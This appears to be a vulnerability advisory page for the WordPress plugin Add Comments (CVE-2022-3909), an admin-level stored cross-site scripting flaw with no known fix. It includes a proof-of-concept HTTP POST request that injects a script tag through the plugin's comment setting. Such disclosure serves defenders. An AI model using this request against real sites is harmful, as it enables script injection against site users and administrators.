WordPress Plugin Vulnerabilities

Add Comments <= 1.0.1 - Admin+ Stored XSS

Description

The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

Proof of Concept

POST /wp-admin/options-general.php?page=addComments HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://testing.local/wp-admin/options-general.php?page=addComments
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Origin: http://testing.local
Connection: close
Cookie: <snip>
Upgrade-Insecure-Requests: 1

post_or_page=post&posts_list=1&pages_list=3&author_name=rss+feed+comments&author_email=fancybear0x%40gmail.com&author_url=&author_ip=127.0.0.1&comment=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&action=addcomments

Affects Plugins

Plugin icon
add-comments
No known fix

References

CVE
CVE-2022-3909

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
3.4 (low)

Miscellaneous

Original Researcher
roguethread
Submitter
roguethread
Verified
Yes
WPVDB ID
8d57a534-7630-491a-a0fd-90430f85ae78

Timeline

Publicly Published
2022-11-10 (about 1 years ago)
Added
2022-11-10 (about 1 years ago)
Last Updated
2022-11-10 (about 1 years ago)

Other

Published
Title
Published
2020-07-29
Title
Reality < 2.5.6 - Multiple Reflected Cross-Site Scripting (XSS)
Published
2014-08-01
Title
Accept Signups 0.1 - XSS
Published
2014-05-28
Title
Malware Finder <= 1.1 - Cross-Site Scripting (XSS)
Published
2021-09-21
Title
Video Gallery - Vimeo and YouTube Gallery < 1.1.5 - Admin+ Stored Cross-Site Scripting
Published
2023-09-04
Title
Goods Catalog <= 2.4.1 - Contributor+ Stored XSS